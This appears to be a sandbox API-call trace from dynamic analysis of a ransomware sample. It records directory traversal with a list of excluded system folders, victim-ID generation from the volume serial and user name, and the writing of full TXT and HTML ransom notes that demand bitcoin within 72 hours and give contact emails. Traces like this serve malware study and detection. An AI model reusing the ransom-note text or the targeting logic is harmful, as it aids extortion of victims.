	[0166.075] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*") returned 0x37
	[0166.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="windows") returned 0x0
	[0166.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.075] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="boot") returned 0x0
	[0166.075] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="system volume information") returned 0x0
	[0166.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="temp") returned 0x0
	[0166.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.076] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="program files") returned 0x0
	[0166.076] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="appdata") returned 0x0
	[0166.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="application data") returned 0x0
	[0166.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.077] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="winnt") returned 0x0
	[0166.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.078] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="tmp") returned 0x0
	[0166.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="cache") returned 0x0
	[0166.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.083] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="webcache") returned 0x0
	[0166.083] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="inetcache") returned 0x0
	[0166.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="nvidia") returned 0x0
	[0166.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="packages") returned 0x0
	[0166.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.084] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="cookies") returned 0x0
	[0166.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.085] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\*.*", lpSrch="programdata") returned 0x0
	[0166.085] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0166.085] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0166.085] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4bfed4, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7c83edb5, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.085] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0166.085] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Catalog", cAlternateFileName="")) returned 1
	[0166.085] lstrcmpW (lpString1="Catalog", lpString2="..") returned 1
	[0166.085] lstrcmpW (lpString1="Catalog", lpString2=".") returned 1
	[0166.086] lstrcpyW (in: lpString1=0x18a87c, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData"
	[0166.086] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\"
	[0166.086] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\", lpString2="Catalog" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog"
	[0166.086] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog"
	[0166.086] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\"
	[0166.086] lstrcpyW (in: lpString1=0x189964, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\"
	[0166.086] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*"
	[0166.086] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.089] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*") returned 63
	[0166.089] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.089] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*", cchLength=0x3f | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*") returned 0x3f
	[0166.089] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.089] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="windows") returned 0x0
	[0166.089] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.089] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="boot") returned 0x0
	[0166.090] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.090] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="system volume information") returned 0x0
	[0166.090] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.090] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.090] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.090] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="temp") returned 0x0
	[0166.090] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.091] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="program files") returned 0x0
	[0166.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.091] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.091] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="appdata") returned 0x0
	[0166.091] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.091] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="application data") returned 0x0
	[0166.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.092] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="winnt") returned 0x0
	[0166.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.092] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="tmp") returned 0x0
	[0166.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.092] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="cache") returned 0x0
	[0166.092] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.093] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="temporary internet files") returned 0x0
	[0166.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.093] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="webcache") returned 0x0
	[0166.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.093] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="inetcache") returned 0x0
	[0166.093] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.095] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="nvidia") returned 0x0
	[0166.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.095] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="packages") returned 0x0
	[0166.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.095] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="cookies") returned 0x0
	[0166.095] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.096] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="programdata") returned 0x0
	[0166.096] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a4d6f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0166.096] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1
	[0166.096] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1d7a743f, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 0
	[0166.096] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0166.097] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0166.097] lstrcpyW (in: lpString1=0x189d74, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog"
	[0166.097] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*"
	[0166.097] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.098] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.098] wsprintfW (in: param_1=0x189660, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\HELP_DECRYPT_YOUR_FILES.TXT") returned 87
	[0166.098] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.098] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0166.099] WriteFile (in: hFile=0x390, lpBuffer=0x188a18*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18993c, lpOverlapped=0x0 | out: lpBuffer=0x188a18*, lpNumberOfBytesWritten=0x18993c*=0xc46, lpOverlapped=0x0) returned 1
	[0166.101] CloseHandle (hObject=0x390) returned 1
	[0166.102] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1889e8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1889e8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.102] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.103] GetUserNameA (in: lpBuffer=0x1888cc, pcbBuffer=0x1889e4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1889e4) returned 1
	[0166.104] wsprintfW (in: param_1=0x189868, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0166.104] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.104] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0166.104] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0166.104] WriteFile (in: hFile=0x390, lpBuffer=0x189868*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x189944, lpOverlapped=0x0 | out: lpBuffer=0x189868*, lpNumberOfBytesWritten=0x189944*=0x30, lpOverlapped=0x0) returned 1
	[0166.105] CloseHandle (hObject=0x390) returned 1
	[0166.105] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0166.106] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0166.106] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0166.106] wsprintfW (in: param_1=0x189620, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\HELP_DECRYPT_YOUR_FILES.HTML") returned 88
	[0166.106] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.106] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0166.107] WriteFile (in: hFile=0x390, lpBuffer=0x188e14*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0x188e14*, lpNumberOfBytesWritten=0x189938*=0x808, lpOverlapped=0x0) returned 1
	[0166.120] CloseHandle (hObject=0x390) returned 1
	[0166.121] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0166.121] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x188dfc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x188dfc*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0166.121] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0166.122] GetUserNameA (in: lpBuffer=0x188ce0, pcbBuffer=0x188df8 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x188df8) returned 1
	[0166.123] wsprintfA (in: param_1=0x189828, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.123] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0166.123] SetFilePointer (in: hFile=0x390, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0166.124] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0166.124] WriteFile (in: hFile=0x390, lpBuffer=0x189828*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x189940, lpOverlapped=0x0 | out: lpBuffer=0x189828*, lpNumberOfBytesWritten=0x189940*=0x43, lpOverlapped=0x0) returned 1
	[0166.124] CloseHandle (hObject=0x390) returned 1
	[0166.124] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*"), lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d7a4d6f, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x1d7a4d6f, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x7c88b5be, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9bf0
	[0166.126] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*") returned 63
	[0166.126] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0166.126] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*.*", cchLength=0x3f | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*") returned 0x3f
	[0166.126] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.127] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="windows") returned 0x0
	[0166.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.127] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="boot") returned 0x0
	[0166.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.127] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="system volume information") returned 0x0
	[0166.127] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.127] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0166.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="temp") returned 0x0
	[0166.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="program files") returned 0x0
	[0166.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.128] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="program files (x86)") returned 0x0
	[0166.128] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0166.129] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\machinedata\\catalog\\*.*", lpSrch="appdata") returned 0x0
	[0166.129] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
